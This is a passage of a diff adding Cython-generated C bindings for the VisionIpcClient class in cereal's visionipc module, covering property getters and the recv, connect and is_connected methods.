*__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":133 + * @property + * def num_buffers(self): + * return self.client.num_buffers # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->client->num_buffers); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 133, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":131 + * return self.client.buffers[0].len if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def num_buffers(self): + * return self.client.num_buffers + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.num_buffers.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":135 + * return self.client.num_buffers + * + * @property # <<<<<<<<<<<<<< + * def frame_id(self): + * return self.extra.frame_id + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":137 + * @property + * def frame_id(self): + * return self.extra.frame_id # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_uint32_t(__pyx_v_self->extra.frame_id); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 137, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":135 + * return self.client.num_buffers + * + * @property # <<<<<<<<<<<<<< + * def frame_id(self): + * return self.extra.frame_id + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.frame_id.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":139 + * return self.extra.frame_id + * + * @property # <<<<<<<<<<<<<< + * def timestamp_sof(self): + * return self.extra.timestamp_sof + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":141 + * @property + * def timestamp_sof(self): + * return self.extra.timestamp_sof # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_uint64_t(__pyx_v_self->extra.timestamp_sof); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":139 + * return self.extra.frame_id + * + * @property # <<<<<<<<<<<<<< + * def timestamp_sof(self): + * return self.extra.timestamp_sof + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.timestamp_sof.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":143 + * return self.extra.timestamp_sof + * + * @property # <<<<<<<<<<<<<< + * def timestamp_eof(self): + * return self.extra.timestamp_eof + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":145 + * @property + * def timestamp_eof(self): + * return self.extra.timestamp_eof # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_uint64_t(__pyx_v_self->extra.timestamp_eof); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":143 + * return self.extra.timestamp_sof + * + * @property # <<<<<<<<<<<<<< + * def timestamp_eof(self): + * return self.extra.timestamp_eof + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.timestamp_eof.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":147 + * return self.extra.timestamp_eof + * + * @property # <<<<<<<<<<<<<< + * def valid(self): + * return self.extra.valid + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":149 + * @property + * def valid(self): + * return self.extra.valid # <<<<<<<<<<<<<< + * + * def recv(self, int timeout_ms=100): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->extra.valid); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":147 + * return self.extra.timestamp_eof + * + * @property # <<<<<<<<<<<<<< + * def valid(self): + * return self.extra.valid + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.valid.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":151 + * return self.extra.valid + * + * def recv(self, int timeout_ms=100): # <<<<<<<<<<<<<< + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv = {"recv", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_timeout_ms; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("recv (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_timeout_ms,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timeout_ms); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "recv") < 0)) __PYX_ERR(0, 151, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + if (values[0]) { + __pyx_v_timeout_ms = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_timeout_ms == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) + } else { + __pyx_v_timeout_ms = ((int)0x64); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("recv", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 151, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.recv", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_4recv(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self), __pyx_v_timeout_ms); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_4recv(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, int __pyx_v_timeout_ms) { + VisionBuf *__pyx_v_buf; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("recv", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":152 + * + * def recv(self, int timeout_ms=100): + * buf = self.client.recv(&self.extra, timeout_ms) # <<<<<<<<<<<<<< + * if not buf: + * return None + */ + __pyx_v_buf = __pyx_v_self->client->recv((&__pyx_v_self->extra), __pyx_v_timeout_ms); + + /* "cereal/visionipc/visionipc_pyx.pyx":153 + * def recv(self, int timeout_ms=100): + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: # <<<<<<<<<<<<<< + * return None + * return VisionBuf.create(buf) + */ + __pyx_t_1 = (!(__pyx_v_buf != 0)); + if (__pyx_t_1) { + + /* "cereal/visionipc/visionipc_pyx.pyx":154 + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: + * return None # <<<<<<<<<<<<<< + * return VisionBuf.create(buf) + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":153 + * def recv(self, int timeout_ms=100): + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: # <<<<<<<<<<<<<< + * return None + * return VisionBuf.create(buf) + */ + } + + /* "cereal/visionipc/visionipc_pyx.pyx":155 + * if not buf: + * return None + * return VisionBuf.create(buf) # <<<<<<<<<<<<<< + * + * def connect(self, bool blocking): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_f_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_create(__pyx_v_buf); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":151 + * return self.extra.valid + * + * def recv(self, int timeout_ms=100): # <<<<<<<<<<<<<< + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.recv", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":157 + * return VisionBuf.create(buf) + * + * def connect(self, bool blocking): # <<<<<<<<<<<<<< + * return self.client.connect(blocking) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect = {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + bool __pyx_v_blocking; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("connect (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_blocking,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_blocking)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 157, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "connect") < 0)) __PYX_ERR(0, 157, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_blocking = __Pyx_PyObject_IsTrue(values[0]); if (unlikely((__pyx_v_blocking == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 157, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("connect", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 157, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6connect(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self), __pyx_v_blocking); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6connect(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, bool __pyx_v_blocking) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("connect", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":158 + * + * def connect(self, bool blocking): + * return self.client.connect(blocking) # <<<<<<<<<<<<<< + * + * def is_connected(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->client->connect(__pyx_v_blocking)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 158, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":157 + * return VisionBuf.create(buf) + * + * def connect(self, bool blocking): # <<<<<<<<<<<<<< + * return self.client.connect(blocking) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":160 + * return self.client.connect(blocking) + * + * def is_connected(self): # <<<<<<<<<<<<<< + * return self.client.is_connected() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected = {"is_connected", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_connected (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_connected", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_connected", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8is_connected(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8is_connected(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_connected", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":161 + * + * def is_connected(self): + * return self.client.is_connected() # <<<<<<<<<<<<<< + * + * @staticmethod + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->client->is_connected()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":160 + * return self.client.connect(blocking) + * + * def is_connected(self): # <<<<<<<<<<<<<< + * return self.client.is_connected() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.is_connected", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":163 + * return self.client.is_connected() + * + * @staticmethod # <<<<<<<<<<<<<< + * def available_streams(string name, bool block): + * return cppVisionIpcClient.getAvailableStreams(name, block) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams(CYTHON_UNUSED PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams = {"available_streams", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams(CYTHON_UNUSED PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + std::string __pyx_v_name; + bool __pyx_v_block; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("available_streams (wrapper)", 0); + { + 